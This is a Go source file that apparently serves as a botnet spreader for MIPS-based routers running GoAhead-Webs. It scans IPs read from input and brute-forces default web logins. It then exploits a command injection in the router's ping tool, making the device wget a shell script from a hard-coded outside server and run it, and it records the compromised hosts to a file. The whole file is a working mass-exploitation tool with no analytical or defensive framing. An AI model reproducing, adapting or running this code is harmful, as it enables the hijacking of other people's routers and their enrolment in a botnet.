1
/*
2

3
	Coded by Benshii Varga
4

5
	1k mips and mipsel
6

7
*/
8

9
package main
10

11
import (
12
	"fmt"
13
    "net"
14
    "time"
15
    "bufio"
16
    "os"
17
    "sync"
18
    "strings"
19
    "math/rand"
20
	"encoding/base64"
21
	//"strconv"
22
)
23

24
var syncWait sync.WaitGroup
25
var statusLogins, statusAttempted, statusFound int
26
var loginsString = []string{"admin:admin", "user:user", "admin:1234", "admin:12345", "admin:123456"}
27

28
var serverIp string = "185.184.54.151"
29
var serverBin string = "76d32be0.sh" // Server bash file. Can be used with directories
30

31
func zeroByte(a []byte) {
32
    for i := range a {
33
        a[i] = 0
34
    }
35
}
36

37
func verifySploit(target string, enLogin string) {
38
	conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
39
	   if err != nil {
40
		return
41
	}
42

43
	conn.SetWriteDeadline(time.Now().Add(60 * time.Second))
44
	conn.Write([]byte("GET /adm/systools.asp HTTP/1.1\r\nHost: " + target + "\r\nCache-Control: max-age=0\r\nAuthorization: Basic " + enLogin + "\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nReferer: http://" + target + "/adm/systools.asp\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
45
	conn.SetReadDeadline(time.Now().Add(60 * time.Second))
46

47
	bytebuf := make([]byte, 512)
48
	l, err := conn.Read(bytebuf)
49
	if err != nil || l <= 0 {
50
		conn.Close()
51
		return
52
	}
53

54
	return
55
}
56

57
func sendExploit(target string, strLength int, enLogin string) {
58

59
	conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
60
	   if err != nil {
61
		return
62
	}
63

64
	conn.SetWriteDeadline(time.Now().Add(60 * time.Second))
65
	conn.Write([]byte("POST /goform/sysTools HTTP/1.1\r\nHost: " + target + "\r\nContent-Length: 114\r\nCache-Control: max-age=0\r\nAuthorization: Basic " + enLogin +"\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: http://" + target + "\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nReferer: http://" + target + "/adm/systools.asp\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\ntool=0&pingCount=4&host=1.1.1.1%3B+wget+http%3A%2F%2F" + serverIp + "%2F" + serverBin + "%3B+chmod+777+c.sh%3B+sh+c.sh&sumbit=OK\r\n\r\n"))
66
	conn.SetReadDeadline(time.Now().Add(60 * time.Second))
67

68
	bytebuf := make([]byte, 512)
69
	l, err := conn.Read(bytebuf)
70
	if err != nil || l <= 0 {
71
		conn.Close()
72
		return
73
	}
74

75
	verifySploit(target, enLogin)
76

77
	f, err := os.OpenFile("logins.txt", os.O_APPEND|os.O_WRONLY, 0644)
78
    if err != nil {
79
        fmt.Println(err)
80
        return
81
    }
82
	/*deLogin, err := base64.StdEncoding.DecodeString(enLogin)
83
	if err != nil {
84
		fmt.Println(err)
85
		return
86
	}*/
87

88
    _, err = fmt.Fprintln(f, target)
89
    if err != nil {
90
      fmt.Println(err)
91
    }
92

93
	return
94
}
95

96
func sendLogin(target string) int {
97

98
	var isLoggedIn int = 0
99
	var cntLen int
100

101
	for x := 0; x < len(loginsString); x++ {
102

103
		conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
104
	    if err != nil {
105
			return -1
106
	    }
107

108
		//fmt.Printf("[i] Bruting with combo %s\r\n", loginsString[x])
109

110
		login := base64.StdEncoding.EncodeToString([]byte(loginsString[x]))
111

112
		cntLen = 44
113
		cntLen += len(login)
114

115
	    conn.SetWriteDeadline(time.Now().Add(60 * time.Second))
116
	    conn.Write([]byte("GET /internet/wan.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\r\nCache-Control: max-age=0\r\nAuthorization: Basic " + login +"\r\nUpgrade-Insecure-Requests: 1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nReferer: http://" + target + "/home.asp\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
117
		conn.SetReadDeadline(time.Now().Add(60 * time.Second))
118

119
		bytebuf := make([]byte, 512)
120
		l, err := conn.Read(bytebuf)
121
		if err != nil || l <= 0 {
122
			conn.Close()
123
		    return -1
124
		}
125

126
		if strings.Contains(string(bytebuf), "Server: GoAhead-Webs") && strings.Contains(string(bytebuf), "HTTP/1.0 200 OK") && strings.Contains(string(bytebuf), "VINGA"){
127
			statusLogins++
128
			sendExploit(target, cntLen, login)
129
			isLoggedIn = 1
130
			return 1
131
		}else {
132
			return -1
133
		}
134

135
		zeroByte(bytebuf)
136

137
		if isLoggedIn == 0 {
138
			conn.Close()
139
			continue
140
		}
141

142
		conn.Close()
143
		break
144
	}
145
	return 1
146

147
	/*if isLoggedIn == 1 {
148
		//sendExploit(target, cntLen, login)
149
		statusLogins++
150
		return 1
151
	} else {
152
		return -1
153
	}*/
154
}
155

156
func checkDevice(target string, timeout time.Duration) int {
157

158
	var isGpon int = 0
159

160
	conn, err := net.DialTimeout("tcp", target, timeout * time.Second)
161
    if err != nil {
162
		return -1
163
    }
164
    conn.SetWriteDeadline(time.Now().Add(timeout * time.Second))
165
	conn.Write([]byte("GET /home.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\r\nAccept: */*\r\nConnection: close\r\n\r\n"))
166
	conn.SetReadDeadline(time.Now().Add(timeout * time.Second))
167

168
	bytebuf := make([]byte, 512)
169
	l, err := conn.Read(bytebuf)
170
	if err != nil || l <= 0 {
171
		conn.Close()
172
	    return -1
173
	}
174

175
	if strings.Contains(string(bytebuf), "HTTP/1.0 200 OK") {
176
		statusFound++
177
		isGpon = 1
178
	}
179
	zeroByte(bytebuf)
180

181
	if isGpon == 0 {
182
		conn.Close()
183
		return -1
184
	}
185

186
	conn.Close()
187
	return 1
188
}
189

190
func processTarget(target string, rtarget string) {
191

192
	defer syncWait.Done()
193

194
	if checkDevice(target, 10) == 1 {
195
		sendLogin(target)
196
		//sendExploit(target, cntLen, login)
197
		return
198
	} else {
199
		return
200
	}
201
}
202

203
func main() {
204

205
	rand.Seed(time.Now().UTC().UnixNano())
206
	var i int = 0
207
    go func() {
208
		for {
209
			fmt.Printf("%d's | Total: %d, Found: %d, Logins: %d\r\n", i, statusAttempted, statusFound, statusLogins)
210
			time.Sleep(1 * time.Second)
211
			i++
212
		}
213
	}()
214

215
    for {
216
        r := bufio.NewReader(os.Stdin)
217
        scan := bufio.NewScanner(r)
218
        for scan.Scan() {
219
            go processTarget(scan.Text() + ":" + os.Args[1], scan.Text())
220
			statusAttempted++
221
            syncWait.Add(1)
222
        }
223
    }
224
}
225

226